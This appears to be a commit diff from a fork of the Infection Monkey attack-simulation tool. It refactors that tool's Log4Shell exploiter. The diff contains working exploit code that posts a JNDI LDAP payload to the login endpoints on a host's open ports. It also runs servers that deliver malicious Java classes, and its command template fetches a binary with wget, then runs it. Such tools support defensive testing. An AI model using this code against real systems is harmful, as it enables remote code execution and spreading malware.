forked from p34709852/monkey
Agent: add the docker POC exploit to log4shell
Implements the infrastructure needed to add different log4shell exploits and adds the
This commit is contained in:
parent
206abfa5e8
commit
0659fddac6
|
@ -3,14 +3,13 @@ import http.server
|
||||||
import logging
|
import logging
|
||||||
from threading import Thread
|
from threading import Thread
|
||||||
|
|
||||||
import requests
|
|
||||||
|
|
||||||
from common.utils.exploit_enum import ExploitType
|
from common.utils.exploit_enum import ExploitType
|
||||||
from infection_monkey.exploit.log4shell_utils import LDAPExploitServer, build_exploit_bytecode
|
from infection_monkey.exploit.log4shell_utils import LDAPExploitServer, build_exploit_bytecode
|
||||||
from infection_monkey.exploit.log4shell_utils.exploit_builder import (
|
from infection_monkey.exploit.log4shell_utils.exploit_builder import (
|
||||||
LINUX_EXPLOIT_TEMPLATE_PATH,
|
LINUX_EXPLOIT_TEMPLATE_PATH,
|
||||||
WINDOWS_EXPLOIT_TEMPLATE_PATH,
|
WINDOWS_EXPLOIT_TEMPLATE_PATH,
|
||||||
)
|
)
|
||||||
|
from infection_monkey.exploit.log4shell_utils.requests import exploits
|
||||||
from infection_monkey.exploit.tools.helpers import get_monkey_depth
|
from infection_monkey.exploit.tools.helpers import get_monkey_depth
|
||||||
from infection_monkey.exploit.tools.http_tools import HTTPTools
|
from infection_monkey.exploit.tools.http_tools import HTTPTools
|
||||||
from infection_monkey.exploit.web_rce import WebRCE
|
from infection_monkey.exploit.web_rce import WebRCE
|
||||||
|
@ -26,8 +25,6 @@ from infection_monkey.utils.monkey_dir import get_monkey_dir_path
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
LDAP_PAYLOAD = "${jndi:ldap://192.168.56.1:8080/dn=Exploit}"
|
|
||||||
|
|
||||||
|
|
||||||
class Log4ShellExploiter(WebRCE):
|
class Log4ShellExploiter(WebRCE):
|
||||||
_TARGET_OS_TYPE = ["linux", "windows"]
|
_TARGET_OS_TYPE = ["linux", "windows"]
|
||||||
|
@ -36,7 +33,6 @@ class Log4ShellExploiter(WebRCE):
|
||||||
LDAP_PORT = 8080
|
LDAP_PORT = 8080
|
||||||
CLASS_HTTP_SERVER_PORT = 1337
|
CLASS_HTTP_SERVER_PORT = 1337
|
||||||
DOWNLOAD_TIMEOUT = 15
|
DOWNLOAD_TIMEOUT = 15
|
||||||
URLS = ["http://192.168.56.101:8080/login"]
|
|
||||||
|
|
||||||
def __init__(self, host: VictimHost):
|
def __init__(self, host: VictimHost):
|
||||||
super().__init__(host)
|
super().__init__(host)
|
||||||
|
@ -57,11 +53,13 @@ class Log4ShellExploiter(WebRCE):
|
||||||
java_class = self.build_java_class(command)
|
java_class = self.build_java_class(command)
|
||||||
class_http_server_ip = get_interface_to_target(self.host.ip_addr)
|
class_http_server_ip = get_interface_to_target(self.host.ip_addr)
|
||||||
|
|
||||||
java_class_http_thread = self.get_java_class_server_thread(class_http_server_ip, java_class)
|
java_class_http_thread = Log4ShellExploiter.get_java_class_server_thread(
|
||||||
|
class_http_server_ip, java_class
|
||||||
|
)
|
||||||
java_class_http_thread.start()
|
java_class_http_thread.start()
|
||||||
|
|
||||||
ldap = LDAPExploitServer(
|
ldap = LDAPExploitServer(
|
||||||
ldap_server_port=8080,
|
ldap_server_port=Log4ShellExploiter.LDAP_PORT,
|
||||||
http_server_ip=class_http_server_ip,
|
http_server_ip=class_http_server_ip,
|
||||||
http_server_port=self.CLASS_HTTP_SERVER_PORT,
|
http_server_port=self.CLASS_HTTP_SERVER_PORT,
|
||||||
storage_dir=get_monkey_dir_path(),
|
storage_dir=get_monkey_dir_path(),
|
||||||
|
@ -69,13 +67,13 @@ class Log4ShellExploiter(WebRCE):
|
||||||
ldap_thread = ldap.get_run_thread()
|
ldap_thread = ldap.get_run_thread()
|
||||||
ldap_thread.start()
|
ldap_thread.start()
|
||||||
|
|
||||||
payload = {"uname": self.build_ldap_payload(), "password": "m0nk3y"}
|
# Try to exploit all services,
|
||||||
try:
|
# because we don't know which services are running and on which ports
|
||||||
requests.post(Log4ShellExploiter.URLS[0], data=payload, timeout=5, verify=False)
|
open_ports = [
|
||||||
except requests.ReadTimeout:
|
port[0] for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
|
||||||
logger.error("Couldn't send request to the vulnerable machine")
|
]
|
||||||
return False
|
for exploit in exploits:
|
||||||
finally:
|
exploit(payload=self.build_ldap_payload(), host=self.host, open_ports=open_ports)
|
||||||
http_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
http_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
||||||
http_thread.stop()
|
http_thread.stop()
|
||||||
|
|
||||||
|
@ -147,7 +145,8 @@ class Log4ShellExploiter(WebRCE):
|
||||||
):
|
):
|
||||||
server.handle_request()
|
server.handle_request()
|
||||||
|
|
||||||
def get_java_class_server_thread(self, ip: str, java_class: bytes):
|
@staticmethod
|
||||||
|
def get_java_class_server_thread(ip: str, java_class: bytes):
|
||||||
Log4ShellExploiter.HTTPHandler.java_class = java_class
|
Log4ShellExploiter.HTTPHandler.java_class = java_class
|
||||||
|
|
||||||
return Thread(target=Log4ShellExploiter._run_class_http_server, args=[ip])
|
return Thread(target=Log4ShellExploiter._run_class_http_server, args=[ip])
|
||||||
|
|
|
@ -0,0 +1,3 @@
|
||||||
|
from .poc_docker import trigger_exploit as exploit_poc
|
||||||
|
|
||||||
|
exploits = [exploit_poc]
|
|
@ -0,0 +1,25 @@
|
||||||
|
from logging import getLogger
|
||||||
|
from typing import List
|
||||||
|
|
||||||
|
import requests
|
||||||
|
|
||||||
|
from infection_monkey.model import VictimHost
|
||||||
|
|
||||||
|
logger = getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
def trigger_exploit(payload: str, host: VictimHost, open_ports: List[int]):
|
||||||
|
urls = build_urls(open_ports, host)
|
||||||
|
payload = {"uname": payload, "password": "m0nk3y"}
|
||||||
|
for url in urls:
|
||||||
|
try:
|
||||||
|
requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123
|
||||||
|
except requests.ReadTimeout:
|
||||||
|
logger.debug("Couldn't send request to the vulnerable machine")
|
||||||
|
|
||||||
|
|
||||||
|
def build_urls(open_ports: List[int], host: VictimHost) -> List[str]:
|
||||||
|
urls = []
|
||||||
|
for port in open_ports:
|
||||||
|
urls.append(f"http://{host.ip_addr}:{port}/login")
|
||||||
|
return urls
|
|
@ -64,7 +64,6 @@ LOG4SHELL_LINUX_COMMAND = (
|
||||||
"wget -O %(monkey_path)s %(http_path)s ;"
|
"wget -O %(monkey_path)s %(http_path)s ;"
|
||||||
" chmod +x %(monkey_path)s ;"
|
" chmod +x %(monkey_path)s ;"
|
||||||
" %(monkey_path)s %(monkey_type)s %(parameters)s"
|
" %(monkey_path)s %(monkey_type)s %(parameters)s"
|
||||||
# "touch /tmp/test_with_new"
|
|
||||||
)
|
)
|
||||||
|
|
||||||
LOG4SHELL_WINDOWS_COMMAND = (
|
LOG4SHELL_WINDOWS_COMMAND = (
|
||||||
|
|
Loading…
Reference in New Issue